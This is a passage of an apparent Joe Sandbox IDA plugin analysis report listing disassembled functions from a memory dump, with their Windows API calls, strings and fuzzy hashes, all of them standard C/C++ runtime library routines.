Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a1d6b8c4b27e0a55d6501e70ac37412f8138333c165689d7c820008571965b5
Instruction ID: f4cac9d12599783e0753ae0ef41d1f18bc2f4684cac0c2d4c714ae4e77bd2e24
Opcode Fuzzy Hash: 7a1d6b8c4b27e0a55d6501e70ac37412f8138333c165689d7c820008571965b5
Instruction Fuzzy Hash: B8415A767002009BDB1496389C993EB77C3DBD1321F55C865E899CB292CB39CD8D8F91

Function 0018EA27 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(001C0118,00000FA0,?,?,0018E8E5), ref: 0018EA33
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0018E8E5), ref: 0018EA3E
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0018E8E5), ref: 0018EA4F
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0018EA61
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0018EA6F
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0018E8E5), ref: 0018EA92
DeleteCriticalSection.KERNEL32(001C0118,00000007,?,?,0018E8E5), ref: 0018EAB5
CloseHandle.KERNEL32(00000000,?,?,0018E8E5), ref: 0018EAC5

Strings

WakeAllConditionVariable, xrefs: 0018EA67
SleepConditionVariableCS, xrefs: 0018EA5B
kernel32.dll, xrefs: 0018EA4A
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0018EA39

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 789c6201ecd753474f2db51b6d4ec88a632db48410f393027ab343046902beab
Instruction ID: 6f2b8b22ce3a186f16b045dc05e742b49ebf0262220307d48b7e3d6610f21537
Opcode Fuzzy Hash: 789c6201ecd753474f2db51b6d4ec88a632db48410f393027ab343046902beab
Instruction Fuzzy Hash: 0301F731B41311EFDB266BB5AD4DF667AD8AB94F41B084225FD09D3990DB70C980CBE1

Function 0019DCF3 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0019DE12
___TypeMatch.LIBVCRUNTIME ref: 0019DF20
CatchIt.LIBVCRUNTIME ref: 0019DF71
_UnwindNestedFrames.LIBCMT ref: 0019E072
CallUnexpected.LIBVCRUNTIME ref: 0019E08D

Strings

csm, xrefs: 0019DE49
csm, xrefs: 0019DD9D
csm, xrefs: 0019DD30

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 1108d99e781c4c663b17c57d2235160117ab3de69614ea9b305ac89e8983e0e5
Instruction ID: 6377c0f9b1467e370b84c73f150cf4a1f5e7e93717dbca214ca4b249e8b74aea
Opcode Fuzzy Hash: 1108d99e781c4c663b17c57d2235160117ab3de69614ea9b305ac89e8983e0e5
Instruction Fuzzy Hash: B4B1AE71D00209EFCF29DFA4E8819AEBBB5FF24310F15406AF8156B212D771EA52CB91

Function 001AF1EA Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(02A15330,02A15330,00000000,7FFFFFFF,?,001AF1D5,02A15330,02A15330,00000000,02A15330,?,?,?,?,02A15330,00000000), ref: 001AF290
__alloca_probe_16.LIBCMT ref: 001AF34B
__alloca_probe_16.LIBCMT ref: 001AF3DA
__freea.LIBCMT ref: 001AF425
__freea.LIBCMT ref: 001AF42B
__freea.LIBCMT ref: 001AF461
__freea.LIBCMT ref: 001AF467
__freea.LIBCMT ref: 001AF477

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 1f85f257fd19d4506016d03835888604792583048f31b0d61e125fa693dcecb1
Instruction ID: 96b0ee49128dc6f6dbeaecdd1d51e9b070dd7b4c81a39fbc9a41bbb8bb208a2e
Opcode Fuzzy Hash: 1f85f257fd19d4506016d03835888604792583048f31b0d61e125fa693dcecb1
Instruction Fuzzy Hash: 3771C37A900205ABEF219EE48C41BAF77A5AF5B350F69013EE854A7281D735DD42C7A0

Function 001915FB Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00191644
__alloca_probe_16.LIBCMT ref: 00191670
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 001916AF
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001916CC
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0019170B
__alloca_probe_16.LIBCMT ref: 00191728
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019176A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0019178D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 17d8e83a7b62b5882bbb97268331510f32b0cef839c15c45e9b95908141c2b4d
Instruction ID: a9a4b3b80b2c26f365d88c550ce2966085bbb3d8415395b1a4734f1d4c42143a
Opcode Fuzzy Hash: 17d8e83a7b62b5882bbb97268331510f32b0cef839c15c45e9b95908141c2b4d
Instruction Fuzzy Hash: 2A519C72A0020BBBEF249FE0CC85FAA7BBAEF44780F154529F91496190D771DC908B90

Function 001A2886 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001A290C

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 63be801db4e300405dffe06e9abcfc8b61a7be191d37a312ee2f1498d83404e8
Instruction ID: 14ffcf0b20d9336b4c9ac04af7e23991b7add2e3fd0cea910085230148700d48
Opcode Fuzzy Hash: 63be801db4e300405dffe06e9abcfc8b61a7be191d37a312ee2f1498d83404e8
Instruction Fuzzy Hash: 74B1467AA003669FDB258F6CCC82BAE7BA5EF67710F144165E944AF282D3749D01C7A0

Function 00192740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00192777
___except_validate_context_record.LIBVCRUNTIME ref: 0019277F
_ValidateLocalCookies.LIBCMT ref: 00192808
__IsNonwritableInCurrentImage.LIBCMT ref: 00192833
_ValidateLocalCookies.LIBCMT ref: 00192888

Strings

csm, xrefs: 0019281D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: da171d003b71bed1586adfa47573156631d756a0e2b52e43c79a30adadcb61c5
Instruction ID: 81956b3491fe8721eea416a3ab9f5caa2b667c097de3d8d060eaee90f4468107
Opcode Fuzzy Hash: da171d003b71bed1586adfa47573156631d756a0e2b52e43c79a30adadcb61c5
Instruction Fuzzy Hash: 7E41B134A00218BBCF14EF68C884AAEBBF5BF15324F148555E814AB392D735EA45CB91

Function 001A0912 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,001A0A21,00000000,?,00000000,00000000,B1A7CAD6,?,001A069F,00000022,FlsSetValue,001B2EF8,001B2F00,00000000), ref: 001A09D3

Strings

api-ms-, xrefs: 001A0969
ext-ms-, xrefs: 001A097D

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: cee673dd7d819ba4fd27dfca3019d06dd7f077d300d1bd45a17cf5254d96701b
Instruction ID: 0e0949c45d4983a5c5e892a1b038b4598f130af210c4515683a457a6bc65250e
Opcode Fuzzy Hash: cee673dd7d819ba4fd27dfca3019d06dd7f077d300d1bd45a17cf5254d96701b
Instruction Fuzzy Hash: D9213D39A01215EBE7239B65DC41B6B77689B4B3B8F150210F91EA7292D730ED40C6E0

Function 0019D41C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0019D413,0019250D,001910C4), ref: 0019D42A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019D438
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019D451
SetLastError.KERNEL32(00000000,0019D413,0019250D,001910C4), ref: 0019D4A3

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0134fa7e3faee0c668e5a698d90574bd2f56ab881f1109fb8ca56a2ce4d19639
Instruction ID: 308227fcd83102c5e733edaf47de4720c8a02f3cf3558cdb8454b3722cb71846
Opcode Fuzzy Hash: 0134fa7e3faee0c668e5a698d90574bd2f56ab881f1109fb8ca56a2ce4d19639
Instruction Fuzzy Hash: 4701F73A10A3125EBE252779BC8696B2B85EF117793200329F52446CF2EF315C44D181

Function 001797E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00179804
std::_Facet_Register.LIBCPMT ref: 00179871
std::_Lockit::~_Lockit.LIBCPMT ref: 00179A07

Strings

57Xh, xrefs: 001799B8
57Xh, xrefs: 00179991

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: std::_$Lockit$Facet_Lockit::_Lockit::~_Register
String ID: 57Xh$57Xh
API String ID: 878851027-446803396
Opcode ID: f0cfecdd5a9f71016f4b696349009b0de0e62112473f31c14456406860e6bb50
Instruction ID: 1b6f24c979535cf11c807bac7e0aafab72258c71abf90aa921ee58398e8b822f
Opcode Fuzzy Hash: f0cfecdd5a9f71016f4b696349009b0de0e62112473f31c14456406860e6bb50
Instruction Fuzzy Hash: EA5169706083058FCB24AF288494A2EB7F1AB99354F54892EF58DD7321D734DE889B93

Function 00197D8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3E6C43DE,?,?,00000000,001AFE05,000000FF,?,00197E4D,00197D34,?,00197EE9,00000000), ref: 00197DC1
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00197DD3
FreeLibrary.KERNEL32(00000000,?,?,00000000,001AFE05,000000FF,?,00197E4D,00197D34,?,00197EE9,00000000), ref: 00197DF5

Strings

CorExitProcess, xrefs: 00197DCB
mscoree.dll, xrefs: 00197DBA

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8a39f529475714876122c9ae5e58bec9b3b8f8d0a481597846b9c418c7255af6
Instruction ID: 6c4874bc8e0ee6d81b17f335efacac8bf9172319f456bd8fbee1538bf4edb5dc
Opcode Fuzzy Hash: 8a39f529475714876122c9ae5e58bec9b3b8f8d0a481597846b9c418c7255af6
Instruction Fuzzy Hash: 4A016231954615ABDB119F90DC05FBEBBF8FF44B10F040629F815A26D0DB759940CA90

Function 001A10FA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001A117F
__alloca_probe_16.LIBCMT ref: 001A1248
__freea.LIBCMT ref: 001A12AF

Part of subcall function 0019F9B9: RtlAllocateHeap.NTDLL(00000000,001A1945,000328EC,?,001A1945,00000220,?,0019A5E8,000328EC), ref: 0019F9EB

__freea.LIBCMT ref: 001A12C2
__freea.LIBCMT ref: 001A12CF

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 0819e8928a7fc16c8afa6b3da90de39c19a1b11ead2644990675824092c42129
Instruction ID: d1d60468abc0c0f5f7d2a36cf04d129b2e0f8e3b552c80eb225db08eb2e42715
Opcode Fuzzy Hash: 0819e8928a7fc16c8afa6b3da90de39c19a1b11ead2644990675824092c42129
Instruction Fuzzy Hash: 9851A37A600206BFEF255FA5CC81FBB3AE9DF96750F25052AFE04D6150EB30DC5096A0

Function 00190715 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0019071C
std::_Lockit::_Lockit.LIBCPMT ref: 00190726
codecvt.LIBCPMT ref: 00190760
std::_Facet_Register.LIBCPMT ref: 00190777
std::_Lockit::~_Lockit.LIBCPMT ref: 00190797

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 31503d948b8804452fdfcb9aaf17b5d00951239731076b59c40f32b8ee569f2c
Instruction ID: bf6ca5651480e5d5b6669b09e872cdb23239d0e0b439c3f5ca25232e2334e790
Opcode Fuzzy Hash: 31503d948b8804452fdfcb9aaf17b5d00951239731076b59c40f32b8ee569f2c
Instruction Fuzzy Hash: 7D01C035900119DFCF0AEBE0D845AAD7BB1BFE8320F244509E8146B281CF74AA418F81

Function 0019E118 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0019E01E,?,?,00000000,00000000,00000000,?), ref: 0019E13D
CatchIt.LIBVCRUNTIME ref: 0019E223

Strings

RCC, xrefs: 0019E157
MOC, xrefs: 0019E14F

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: b5e9fc0d2c5cc830b40d1aec7ab8660ac64e36849af2468ad4248c4ea4c11c54
Instruction ID: 6eec2a8531efe8c847953374a4f80b583e111b6c2b46aabb21685276aeb95b3a
Opcode Fuzzy Hash: b5e9fc0d2c5cc830b40d1aec7ab8660ac64e36849af2468ad4248c4ea4c11c54
Instruction Fuzzy Hash: F5416D71900109AFCF16DF98DC81AEE7BF5FF48300F188169F9046B261D335AA51DB91

Function 00176E70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00176E8C

Strings

!gKo, xrefs: 00176ED0
!gKo, xrefs: 00176EB7
!gKo, xrefs: 00176E99

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: !gKo$!gKo$!gKo
API String ID: 4194217158-1776696246
Opcode ID: 3f46247c491d41a67e384ec0cce7b0141b760ead5b651a80a3b244a64db28484
Instruction ID: ebac402cd852cf2e8b39a28c10a4c7f1ea7094c3c0972b95e29b7586ca41bdf0
Opcode Fuzzy Hash: 3f46247c491d41a67e384ec0cce7b0141b760ead5b651a80a3b244a64db28484
Instruction Fuzzy Hash: 9001D6F49086104BCE549B1C985591E77E4DB26344F55C879F68DDB700DB31DC848BA3

Function 001AA3D1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,001AA46D,00000000,?,001C0CF0,?,?,?,001AA3A4,00000004,InitializeCriticalSectionEx,001B34F4,001B34FC), ref: 001AA3DE
GetLastError.KERNEL32(?,001AA46D,00000000,?,001C0CF0,?,?,?,001AA3A4,00000004,InitializeCriticalSectionEx,001B34F4,001B34FC,00000000,?,0019E33C), ref: 001AA3E8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 001AA410

Strings

api-ms-, xrefs: 001AA3F5

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: ff83ab0d151267f6d479592b079bf9c5105807590f71c6a8b32cb1dc47cfb00d
Instruction ID: cdabccc5975960b1ca08734a0747150f73cedda3dc6bba4d1fdfc2b389a18dcc
Opcode Fuzzy Hash: ff83ab0d151267f6d479592b079bf9c5105807590f71c6a8b32cb1dc47cfb00d
Instruction Fuzzy Hash: CAE01A30784304BAEB202F62EC0AB687A54AF11B85F548030F94CA84A1D7A2A9518AA5

Function 001A7600 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(3E6C43DE,00000000,00000000,?), ref: 001A7663

